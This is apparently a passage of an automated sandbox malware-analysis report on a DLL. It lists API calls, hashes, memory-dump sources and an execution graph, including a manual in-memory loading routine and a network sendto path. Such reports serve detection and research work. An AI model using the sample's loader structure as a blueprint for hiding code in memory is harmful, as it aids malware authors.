                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item
                                                                                                          • String ID:
                                                                                                          • API String ID: 369458955-0
                                                                                                          • Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
                                                                                                          • Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A257, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
                                                                                                          • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
                                                                                                          • Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
                                                                                                          • Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001310, Relevance: 6.0, APIs: 4, Instructions: 41networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memsethtonsinet_addrsendto
                                                                                                          • String ID:
                                                                                                          • API String ID: 1158618643-0
                                                                                                          • Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
                                                                                                          • Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10023584, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,E5334AD4), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,E5334AD4), ref: 100235D9
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ActiveEnable$FreeResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 253586258-0
                                                                                                          • Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
                                                                                                          • Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100337CF, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 100337DB
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 100337F2
                                                                                                          • __amsg_exit.LIBCMT ref: 10033800
                                                                                                          • __lock.LIBCMT ref: 10033810
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3521780317-0
                                                                                                          • Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
                                                                                                          • Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002173A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
                                                                                                          • PathFindExtensionA.SHLWAPI(?), ref: 10021778
                                                                                                            • Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                            • Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                            • Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                                                                                          • String ID: %s%s.dll
                                                                                                          • API String ID: 1311856149-1649984862
                                                                                                          • Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
                                                                                                          • Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003785E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499
                                                                                                          • __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003787B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 803148776-1018135373
                                                                                                          • Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
                                                                                                          • Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10002AB0, Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,1000308E,00000000,00000000), ref: 10002B05
                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 10002B47
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 4100373531-0
                                                                                                          • Opcode ID: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction ID: 796d6741741126c51599b2b906ad2ab7a2c15db3fbae67425d52538266fc70d6
                                                                                                          • Opcode Fuzzy Hash: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction Fuzzy Hash: C38182B4A00209DFEB04CF94C981A9EB7B1FF88354F248559E819AB355D735EE82CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A6AB, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                          • LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3253506028-0
                                                                                                          • Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
                                                                                                          • Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002AC8F, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
                                                                                                          • TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
                                                                                                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
                                                                                                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Leave$EnterValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3969253408-0
                                                                                                          • Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                                                                                                          • Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
                                                                                                          • Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                                                                                                          • Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Analysis Process: rundll32.exe PID: 6072 Parent PID: 2240 rundll32.exeCOMMON

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.2%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:452
                                                                                                          Total number of Limit Nodes:17

                                                                                                          Graph

                                                                                                          execution_graph 21113 100036a0 21116 1002e654 21113->21116 21117 1002e707 21116->21117 21127 1002e666 21116->21127 21141 1003654f 6 API calls __decode_pointer 21117->21141 21119 1002e70d 21142 10030d24 67 API calls __getptd_noexit 21119->21142 21124 1002e6c3 RtlAllocateHeap 21124->21127 21125 1002e677 21125->21127 21134 10036507 67 API calls 2 library calls 21125->21134 21135 1003635c 67 API calls 7 library calls 21125->21135 21136 100306e0 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 21125->21136 21127->21124 21127->21125 21128 1002e6f3 21127->21128 21131 1002e6f8 21127->21131 21133 100036c0 21127->21133 21137 1002e605 67 API calls 4 library calls 21127->21137 21138 1003654f 6 API calls __decode_pointer 21127->21138 21139 10030d24 67 API calls __getptd_noexit 21128->21139 21140 10030d24 67 API calls __getptd_noexit 21131->21140 21134->21125 21135->21125 21137->21127 21138->21127 21139->21131 21140->21133 21141->21119 21142->21133 21143 10003440 21144 1000344f 21143->21144 21146 10003454 21143->21146 21149 100033f0 67 API calls _malloc 21144->21149 21147 1002e654 _malloc 67 API calls 21146->21147 21148 10003464 21146->21148 21147->21148 21149->21146 21150 10003160 21153 10002d40 21150->21153 21188 100024a0 21153->21188 21156 10002d83 SetLastError 21180 10002d69 21156->21180 21157 10002d95 21158 100024a0 SetLastError 21157->21158 21159 10002dae 21158->21159 21160 10002dd0 SetLastError 21159->21160 21161 10002de2 21159->21161 21159->21180 21160->21180 21162 10002df1 SetLastError 21161->21162 21163 10002e03 21161->21163 21162->21180 21164 10002e0e SetLastError 21163->21164 21168 10002e20 GetNativeSystemInfo 21163->21168 21164->21180 21166 10002ed4 SetLastError 21166->21180 21167 10002ee6 VirtualAlloc 21169 10002f32 GetProcessHeap HeapAlloc 21167->21169 21170 10002f07 VirtualAlloc 21167->21170 21168->21166 21168->21167 21172 10002f6c 21169->21172 21173 10002f4c VirtualFree SetLastError 21169->21173 21170->21169 21171 10002f23 SetLastError 21170->21171 21171->21180 21174 100024a0 SetLastError 21172->21174 21173->21180 21175 10002fce 21174->21175 21176 10002fdc VirtualAlloc 21175->21176 21186 10002fd2 21175->21186 21177 1000300b 21176->21177 21191 100024d0 21177->21191 21181 1000303f 21181->21186 21201 10002ab0 21181->21201 21185 100030a8 21185->21186 21187 1000310f SetLastError 21185->21187 21186->21180 21220 10003310 VirtualFree VirtualFree GetProcessHeap HeapFree 21186->21220 21187->21186 21189 100024bb 21188->21189 21190 100024af SetLastError 21188->21190 21189->21156 21189->21157 21189->21180 21190->21189 21192 10002500 21191->21192 21193 10002593 21192->21193 21195 1000253c VirtualAlloc 21192->21195 21200 100025b0 21192->21200 21194 100024a0 SetLastError 21193->21194 21198 100025ac 21194->21198 21196 10002560 21195->21196 21197 10002567 21195->21197 21196->21200 21197->21192 21199 100025b4 VirtualAlloc 21198->21199 21198->21200 21199->21200 21200->21181 21202 10002ae9 IsBadReadPtr 21201->21202 21211 10002adf 21201->21211 21204 10002b13 21202->21204 21202->21211 21205 10002b45 SetLastError 21204->21205 21206 10002b59 21204->21206 21204->21211 21205->21211 21221 100023c0 VirtualQuery VirtualFree VirtualAlloc 21206->21221 21208 10002b73 21209 10002b7f SetLastError 21208->21209 21212 10002ba9 21208->21212 21209->21211 21211->21186 21214 100027c0 21211->21214 21212->21211 21213 10002cb9 SetLastError 21212->21213 21213->21211 21215 10002808 21214->21215 21216 10002911 21215->21216 21218 100028ed 21215->21218 21222 10002690 21215->21222 21217 10002690 2 API calls 21216->21217 21217->21218 21218->21185 21220->21180 21221->21208 21223 100026ac 21222->21223 21228 100026a2 21222->21228 21225 10002714 VirtualProtect 21223->21225 21226 100026ba 21223->21226 21225->21228 21227 100026f2 VirtualFree 21226->21227 21226->21228 21227->21228 21228->21215 21229 10024d50 21234 1002b0bb 21229->21234 21231 10024d82 21233 10024d5f 21233->21231 21245 1002acfb 21233->21245 21237 1002b0c7 __EH_prolog3 21234->21237 21236 1002b115 21272 1002ac8f EnterCriticalSection 21236->21272 21237->21236 21253 1002aec4 TlsAlloc 21237->21253 21257 1002adac EnterCriticalSection 21237->21257 21279 10023b5b 78 API calls 3 library calls 21237->21279 21242 1002b13b ~_Task_impl 21242->21233 21243 1002b128 21280 1002af6b 88 API calls 4 library calls 21243->21280 21246 1002ad07 __EH_prolog3_catch 21245->21246 21247 1002ad30 ~_Task_impl 21246->21247 21288 1002a6ab 21246->21288 21247->21233 21249 1002ad16 21250 1002ad23 21249->21250 21298 10024d0b 21249->21298 21301 1002a71d 79 API calls ~_Task_impl 21250->21301 21254 1002aef0 21253->21254 21255 1002aef5 InitializeCriticalSection 21253->21255 21281 10023b23 78 API calls 3 library calls 21254->21281 21255->21237 21262 1002adcf 21257->21262 21258 1002ae8e _memset 21259 1002aea5 LeaveCriticalSection 21258->21259 21259->21237 21260 1002ae08 21282 10023778 21260->21282 21261 1002ae1d GlobalHandle GlobalUnlock 21264 10023778 codecvt 80 API calls 21261->21264 21262->21258 21262->21260 21262->21261 21266 1002ae3b GlobalReAlloc 21264->21266 21267 1002ae47 21266->21267 21268 1002ae6e GlobalLock 21267->21268 21269 1002ae52 GlobalHandle GlobalLock 21267->21269 21270 1002ae60 LeaveCriticalSection 21267->21270 21268->21258 21269->21270 21286 10023b23 78 API calls 3 library calls 21270->21286 21273 1002acd1 LeaveCriticalSection 21272->21273 21274 1002acaa 21272->21274 21276 1002acda 21273->21276 21274->21273 21275 1002acaf TlsGetValue 21274->21275 21275->21273 21277 1002acbb 21275->21277 21276->21242 21276->21243 21277->21273 21278 1002acc0 LeaveCriticalSection 21277->21278 21278->21276 21279->21237 21280->21242 21281->21255 21283 1002378d codecvt 21282->21283 21284 1002379a GlobalAlloc 21283->21284 21287 10001650 80 API calls codecvt 21283->21287 21284->21267 21286->21268 21287->21284 21289 1002a6c0 21288->21289 21290 1002a6bb 21288->21290 21292 1002a6ce 21289->21292 21303 1002a687 InitializeCriticalSection 21289->21303 21302 10023b5b 78 API calls 3 library calls 21290->21302 21294 1002a6e0 EnterCriticalSection 21292->21294 21295 1002a70a EnterCriticalSection 21292->21295 21296 1002a6ff LeaveCriticalSection 21294->21296 21297 1002a6ec InitializeCriticalSection 21294->21297 21295->21249 21296->21295 21297->21296 21304 10024bd0 21298->21304 21300 10024d17 21300->21250 21301->21247 21302->21289 21303->21292 21305 10024bdc __EH_prolog3_catch 21304->21305 21324 1001e8f0 21305->21324 21311 10024c76 21333 1002ac5c 79 API calls codecvt 21311->21333 21313 10024c85 21314 10024c97 21313->21314 21334 100248e2 117 API calls 2 library calls 21313->21334 21335 1002ac5c 79 API calls codecvt 21314->21335 21317 10024caa 21318 10024cbc 21317->21318 21336 10024b06 117 API calls 2 library calls 21317->21336 21337 1002ac5c 79 API calls codecvt 21318->21337 21321 10024cd0 21323 10024ce2 ~_Task_impl 21321->21323 21338 10024b89 117 API calls 2 library calls 21321->21338 21323->21300 21325 1001e8fe 21324->21325 21327 1001e921 21325->21327 21339 10001650 80 API calls codecvt 21325->21339 21328 1001ed40 21327->21328 21329 1001ed82 21328->21329 21330 1001ed76 21328->21330 21332 10020421 67 API calls _malloc 21329->21332 21340 1001f370 21330->21340 21332->21311 21333->21313 21334->21314 21335->21317 21336->21318 21337->21321 21338->21323 21339->21325 21341 1001f38f 21340->21341 21342 1001f3ab 21341->21342 21345 1001f3b9 21341->21345 21347 1001fb60 21342->21347 21344 1001f3b7 21344->21329 21345->21344 21355 1001fc30 80 API calls 21345->21355 21348 1001fb8e 